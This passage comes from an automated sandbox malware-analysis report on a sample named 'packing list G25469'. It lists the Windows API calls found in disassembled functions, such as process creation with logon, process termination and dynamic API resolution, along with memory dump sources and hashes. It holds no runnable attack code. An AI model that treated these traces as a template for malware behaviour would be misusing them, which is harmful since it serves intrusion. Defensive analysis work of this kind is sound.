                                                  • CloseHandle.KERNEL32(00000004), ref: 00B6AFCF
                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B6AFFE
                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 00B6B012
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                  • String ID:
                                                  • API String ID: 1413079979-0
                                                  • Opcode ID: 47c2f45a3616d211264094be4a89e77b7b1df5a5eabb62f1569ffc5cad2d5de6
                                                  • Instruction ID: 52a0cc3a2167d685e592e0515e6ff904b3e0c0ca63e2a5fb33b0465fd8f1273b
                                                  • Opcode Fuzzy Hash: 47c2f45a3616d211264094be4a89e77b7b1df5a5eabb62f1569ffc5cad2d5de6
                                                  • Instruction Fuzzy Hash: BF214C72100209AFDF029F94ED49FEE7BE9EB44304F044165FA01A2161D7BADD61EB62
                                                  APIs
                                                    • Part of subcall function 00B4AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00B4AFE3
                                                    • Part of subcall function 00B4AF83: SelectObject.GDI32(?,00000000), ref: 00B4AFF2
                                                    • Part of subcall function 00B4AF83: BeginPath.GDI32(?), ref: 00B4B009
                                                    • Part of subcall function 00B4AF83: SelectObject.GDI32(?,00000000), ref: 00B4B033
                                                  • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00B9EC20
                                                  • LineTo.GDI32(00000000,00000003,?), ref: 00B9EC34
                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B9EC42
                                                  • LineTo.GDI32(00000000,00000000,?), ref: 00B9EC52
                                                  • EndPath.GDI32(00000000), ref: 00B9EC62
                                                  • StrokePath.GDI32(00000000), ref: 00B9EC72
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                  • String ID:
                                                  • API String ID: 43455801-0
                                                  • Opcode ID: 7f64729a90c437fa0dc99a025903cbc292c267b5e904a7657dc88f25935be873
                                                  • Instruction ID: 6c15c314ee41b3457a0bd6268750db51fd73c9f416a404ae39ec97f995c3ec3b
                                                  • Opcode Fuzzy Hash: 7f64729a90c437fa0dc99a025903cbc292c267b5e904a7657dc88f25935be873
                                                  • Instruction Fuzzy Hash: 39110972000149BFEF029F94DC88EEA7FADEB08350F048562BE189A160DBB19D55DBA0
                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 00B6E1C0
                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B6E1D1
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B6E1D8
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00B6E1E0
                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00B6E1F7
                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 00B6E209
                                                    • Part of subcall function 00B69AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00B69A05,00000000,00000000,?,00B69DDB), ref: 00B6A53A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CapsDevice$ExceptionRaiseRelease
                                                  • String ID:
                                                  • API String ID: 603618608-0
                                                  • Opcode ID: 165e7b11da66c84df6d57d67caad945fc79cff5c6f0700727fd612e2814c9478
                                                  • Instruction ID: ab93d377f566a4595ee60289b27562bb3b9fbba5075b26cb9eb86ad036756aa5
                                                  • Opcode Fuzzy Hash: 165e7b11da66c84df6d57d67caad945fc79cff5c6f0700727fd612e2814c9478
                                                  • Instruction Fuzzy Hash: F2018FB9A00214BFEB109BA68C45B5EBFB8EB48751F004166EE05A7290EA749C00CFA0
                                                  APIs
                                                  • __init_pointers.LIBCMT ref: 00B57B47
                                                    • Part of subcall function 00B5123A: __initp_misc_winsig.LIBCMT ref: 00B5125E
                                                    • Part of subcall function 00B5123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00B57F51
                                                    • Part of subcall function 00B5123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00B57F65
                                                    • Part of subcall function 00B5123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00B57F78
                                                    • Part of subcall function 00B5123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00B57F8B
                                                    • Part of subcall function 00B5123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00B57F9E
                                                    • Part of subcall function 00B5123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00B57FB1
                                                    • Part of subcall function 00B5123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00B57FC4
                                                    • Part of subcall function 00B5123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00B57FD7
                                                    • Part of subcall function 00B5123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00B57FEA
                                                    • Part of subcall function 00B5123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00B57FFD
                                                    • Part of subcall function 00B5123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00B58010
                                                    • Part of subcall function 00B5123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00B58023
                                                    • Part of subcall function 00B5123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00B58036
                                                    • Part of subcall function 00B5123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00B58049
                                                    • Part of subcall function 00B5123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00B5805C
                                                    • Part of subcall function 00B5123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00B5806F
                                                  • __mtinitlocks.LIBCMT ref: 00B57B4C
                                                    • Part of subcall function 00B57E23: InitializeCriticalSectionAndSpinCount.KERNEL32(00BEAC68,00000FA0,?,?,00B57B51,00B55E77,00BE6C70,00000014), ref: 00B57E41
                                                  • __mtterm.LIBCMT ref: 00B57B55
                                                    • Part of subcall function 00B57BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00B57B5A,00B55E77,00BE6C70,00000014), ref: 00B57D3F
                                                    • Part of subcall function 00B57BBD: _free.LIBCMT ref: 00B57D46
                                                    • Part of subcall function 00B57BBD: DeleteCriticalSection.KERNEL32(00BEAC68,?,?,00B57B5A,00B55E77,00BE6C70,00000014), ref: 00B57D68
                                                  • __calloc_crt.LIBCMT ref: 00B57B7A
                                                  • GetCurrentThreadId.KERNEL32 ref: 00B57BA3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                  • String ID:
                                                  • API String ID: 2942034483-0
                                                  • Opcode ID: c277d7f1c6c1d564efcd4c7bc8bd13b4c3c5e1fc0e72b0a7d201b99e34902432
                                                  • Instruction ID: 2f4a46ca1410520dd2cc5f64cc8f8b5d6b39d05d00abf4511bb65045e914a479
                                                  • Opcode Fuzzy Hash: c277d7f1c6c1d564efcd4c7bc8bd13b4c3c5e1fc0e72b0a7d201b99e34902432
                                                  • Instruction Fuzzy Hash: BFF0903238D3621AE62477387D17B4A27C8DF01733B2006D9FE64DA0E2FF2598494561
                                                  APIs
                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B3281D
                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00B32825
                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B32830
                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B3283B
                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00B32843
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B3284B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Virtual
                                                  • String ID:
                                                  • API String ID: 4278518827-0
                                                  • Opcode ID: 10b3dcea8135a7fd4abc28a5021bb9906bce6adb1fe50553ef5ce5fbc767acfe
                                                  • Instruction ID: 75ff7ae21cd536491e7cb8162057433aec6e918afb0f573e019ade4576988f40
                                                  • Opcode Fuzzy Hash: 10b3dcea8135a7fd4abc28a5021bb9906bce6adb1fe50553ef5ce5fbc767acfe
                                                  • Instruction Fuzzy Hash: 140167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00421BA15C47A42C7F5A864CBE5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                  • String ID:
                                                  • API String ID: 1423608774-0
                                                  • Opcode ID: 61366d92d647fff30637171134788ab1ba9620c5595fb130df0e265a24133c83
                                                  • Instruction ID: c6e5907548eff0d49623d0ed6fe6f78c38f060a58a6c06134b12c969480170f6
                                                  • Opcode Fuzzy Hash: 61366d92d647fff30637171134788ab1ba9620c5595fb130df0e265a24133c83
                                                  • Instruction Fuzzy Hash: 5A01A436102212ABD7195B64EC49DEB77B9FF88701B044679F507D31A0EFB89800DB50
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B77C07
                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B77C1D
                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00B77C2C
                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B77C3B
                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B77C45
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B77C4C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                  • String ID:
                                                  • API String ID: 839392675-0
                                                  • Opcode ID: 95b9df23975b9b2a4aca6e388b7afc1ad27f4ca6207b3c8b0bc24830e0e987d5
                                                  • Instruction ID: e279eb97168b79f0de1aee22f60b1df936ec37eec02253020660f0cdcea4385d
                                                  • Opcode Fuzzy Hash: 95b9df23975b9b2a4aca6e388b7afc1ad27f4ca6207b3c8b0bc24830e0e987d5
                                                  • Instruction Fuzzy Hash: B3F09072141158BBE7211B529C0DEEF3BBCDFC6B11F000218FA02E2051EBE41A41C6B5
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(?,?), ref: 00B79A33
                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,00BA5DEE,?,?,?,?,?,00B3ED63), ref: 00B79A44
                                                  • TerminateThread.KERNEL32(?,000001F6,?,?,?,00BA5DEE,?,?,?,?,?,00B3ED63), ref: 00B79A51
                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00BA5DEE,?,?,?,?,?,00B3ED63), ref: 00B79A5E
                                                    • Part of subcall function 00B793D1: CloseHandle.KERNEL32(?,?,00B79A6B,?,?,?,00BA5DEE,?,?,?,?,?,00B3ED63), ref: 00B793DB
                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B79A71
                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00BA5DEE,?,?,?,?,?,00B3ED63), ref: 00B79A78
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                  • String ID:
                                                  • API String ID: 3495660284-0
                                                  • Opcode ID: 1cc67e50a49b34b87436faf8b602f0b445339022fb85dd189218714ed333d046
                                                  • Instruction ID: 6ea1a011e37d967beceed95a478bd2edf450005b1f0a4aab3a776d4eecc0fa2e
                                                  • Opcode Fuzzy Hash: 1cc67e50a49b34b87436faf8b602f0b445339022fb85dd189218714ed333d046
                                                  • Instruction Fuzzy Hash: 9DF08236142211ABD7151BA4EC8DDEB7779FF84701B140665F603921A0EFF99801DB50
                                                  APIs
                                                    • Part of subcall function 00B4F4EA: std::exception::exception.LIBCMT ref: 00B4F51E
                                                    • Part of subcall function 00B4F4EA: __CxxThrowException@8.LIBCMT ref: 00B4F533
                                                  • __swprintf.LIBCMT ref: 00B31EA6
                                                  Strings
                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00B31D49
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                  • API String ID: 2125237772-557222456
                                                  • Opcode ID: 59c5fb5aca2fa485ecaa430e8aa40499cf8478d197f0d505a0deacad21e44ebe
                                                  • Instruction ID: 53b5367e0a168662711553dc78d62464b05c4c16af98aee7e8e950b8cfd7acb7
                                                  • Opcode Fuzzy Hash: 59c5fb5aca2fa485ecaa430e8aa40499cf8478d197f0d505a0deacad21e44ebe
                                                  • Instruction Fuzzy Hash: 24915E71508211AFC714EF28C896D6EBBE8FF95700F20499DF895972A1DB71ED04CB92
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 00B8B006
                                                  • CharUpperBuffW.USER32(?,?), ref: 00B8B115
                                                  • VariantClear.OLEAUT32(?), ref: 00B8B298
                                                    • Part of subcall function 00B79DC5: VariantInit.OLEAUT32(00000000), ref: 00B79E05
                                                    • Part of subcall function 00B79DC5: VariantCopy.OLEAUT32(?,?), ref: 00B79E0E
                                                    • Part of subcall function 00B79DC5: VariantClear.OLEAUT32(?), ref: 00B79E1A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                  • API String ID: 4237274167-1221869570
                                                  • Opcode ID: 4590141dacbf17b309124e36f0ef463975ad61a77c1f4e48b8dc1f2ec5285758
                                                  • Instruction ID: 8c046fc4404d37b03d51213f4f4f669baedfe0e4460b5ac1b738e468b5ef3d13
                                                  • Opcode Fuzzy Hash: 4590141dacbf17b309124e36f0ef463975ad61a77c1f4e48b8dc1f2ec5285758
                                                  • Instruction Fuzzy Hash: 34916B706083019FCB10EF64C495D6BBBE4EF89704F1489ADF89A9B362DB31E945CB52
                                                  APIs
                                                    • Part of subcall function 00B4C6F4: _wcscpy.LIBCMT ref: 00B4C717
                                                  • _memset.LIBCMT ref: 00B75438
                                                  • GetMenuItemInfoW.USER32(?), ref: 00B75467
                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B75513
                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B7553D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                  • String ID: 0
                                                  • API String ID: 4152858687-4108050209
                                                  • Opcode ID: a1162e2173c21b57366c1fb420f39635f6d100e8aca18ad47d8e3ef230b4292b
                                                  • Instruction ID: fffe4022995d440dbccdc9f59333a640318ef8e0cae2a364b7ad0dcdf25fa537
                                                  • Opcode Fuzzy Hash: a1162e2173c21b57366c1fb420f39635f6d100e8aca18ad47d8e3ef230b4292b
                                                  • Instruction Fuzzy Hash: 0451E2715047019BD7249B28C8817BBB7E9EB65350F148AA9F8BED32E0DBE0DD448752
                                                  APIs
                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00B7027B
                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00B702B1
                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00B702C2
                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00B70344
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                  • String ID: DllGetClassObject
                                                  • API String ID: 753597075-1075368562
                                                  • Opcode ID: 2e669548575dcb90520b52fecbf820989293b665613f8dec246c7a3718df4411
                                                  • Instruction ID: aa91396a54d8e74049edfc4d77f87f42ee54f0a80807c78fe11921bb5559c58b
                                                  • Opcode Fuzzy Hash: 2e669548575dcb90520b52fecbf820989293b665613f8dec246c7a3718df4411
                                                  • Instruction Fuzzy Hash: C7415B71610204EFDB05DF64C885BAA7BF9EF48310F15C0AAA91D9F206D7F9D944CBA4
                                                  APIs
                                                  • _memset.LIBCMT ref: 00B75075
                                                  • GetMenuItemInfoW.USER32 ref: 00B75091
                                                  • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00B750D7
                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00BF1708,00000000), ref: 00B75120
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Menu$Delete$InfoItem_memset
                                                  • String ID: 0
                                                  • API String ID: 1173514356-4108050209
                                                  • Opcode ID: 56a98cec8a3943d57f315cf2bca184a0db40560cea421e4a86615bf93715eb23
                                                  • Instruction ID: 849db4594949c56840393017e1d468df4d5343ea2a61225ee93441e728406b0a
                                                  • Opcode Fuzzy Hash: 56a98cec8a3943d57f315cf2bca184a0db40560cea421e4a86615bf93715eb23
                                                  • Instruction Fuzzy Hash: 3941B2712047019FD720DF28D885B6AB7E4EF85315F14869EF96AA7291D7B0E900CB62
                                                  APIs
                                                  • CharLowerBuffW.USER32(?,?,?,?), ref: 00B90587
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: BuffCharLower
                                                  • String ID: cdecl$none$stdcall$winapi
                                                  • API String ID: 2358735015-567219261
                                                  • Opcode ID: a78ae2e4edbda9a10174faf6420bb0a6fc7af5a2a8f250da2e0b5ea06791bbb6
                                                  • Instruction ID: b7f4829fef67a515c8989033f84bf43693ce609e4e53377b91fae5c8db55fac1
                                                  • Opcode Fuzzy Hash: a78ae2e4edbda9a10174faf6420bb0a6fc7af5a2a8f250da2e0b5ea06791bbb6
                                                  • Instruction Fuzzy Hash: BD31B23151021AAFCF00EF58C9819EEB7F8FF55310F1086A9E826A72D1DB71E915CB80
                                                  APIs
